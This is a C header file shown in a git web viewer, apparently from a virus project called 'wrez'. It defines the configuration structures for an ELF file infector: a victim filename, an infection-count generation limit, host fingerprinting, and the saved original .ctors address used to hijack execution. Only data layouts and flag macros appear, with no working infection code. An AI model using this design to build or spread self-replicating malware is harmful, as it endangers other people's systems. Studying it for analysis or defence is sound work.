summaryrefslogtreecommitdiff
path: root/other/wrez/wrconfig.h
blob: 92a190f55a107b37dfd953ad01d511bae7fc27a2 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

#ifndef	WRCONFIG_H
#define	WRCONFIG_H

#pragma pack(1)

#define	VICTIM_LEN	32


/* wrdynconfig
 *
 * only active after the first infection has taken place.
 */

typedef struct {
	unsigned char	cnul;	/* constant 0x00 */
	unsigned int	flags;	/* various flags, see below */

	/* flag dependant fields
	 */
	unsigned int	icount;	/* (WRF_GENERATION_LIMIT) infection count */
	unsigned int	curhost;	/* (WRF_KEEP_FINGERPRINT) this host */

	unsigned char	xxx_temp[8];	/* FIXME: temporary filename for testing */
} wrdynconfig;

/* flag access macros
 */
#define	WRF_ISSET(flags,flagmask) \
	(((flags) & (flagmask)) == (flagmask))
#define	WRF_SET(flags,flagmask) \
	(flags) |= (flagmask);
#define	WRF_CLEAR(flags,flagmask) \
	(flags) &= ~(flagmask);
#define	WRF_TOGGLE(flags,flagmask) \
	(flags) ^= (flagmask);

/* limit propagation by icount, icount is decreased until it reaches 0 */
#define	WRF_GENERATION_LIMIT	0x00000001
/* always keep a fingerprint of the current host in curhost */
#define	WRF_GET_FINGERPRINT	0x00000002


typedef struct {
	unsigned long int	wr_start;	/* virtual start address */
	unsigned long int	decomp_len;
	unsigned long int	wr_oldctors;	/* original .ctors address */

	unsigned long int	elf_base;	/* &elf_header[0] of host */

	union {
		/* upon first infection the victim array is used to carry the
		 * name of the executeable to be infected.
		 * afterwards (i.e. any other infection) this space is
		 * recycled for data specifying various properties of the
		 * virus. see wrcore.c for a more in-depth explanation.
		 *
		 * first infection (set by the "initial" program):
		 *    victim = filename to be infected
		 *    vcfgptr = pointer to memory which will overwrite the
		 *        vcfg structure.
		 */
		struct {
			unsigned char	victim[VICTIM_LEN];
			void *		vcfgptr;
		} vinit;

		wrdynconfig	vcfg;
	} dyn;

	/* compression related data
	 */
	unsigned long int	cmprlen;
	unsigned char		llstuff;
	unsigned short int	hl1stuff;
	unsigned char		hl2stuff;
	unsigned char		hf2stuff;
} wrconfig;

#endif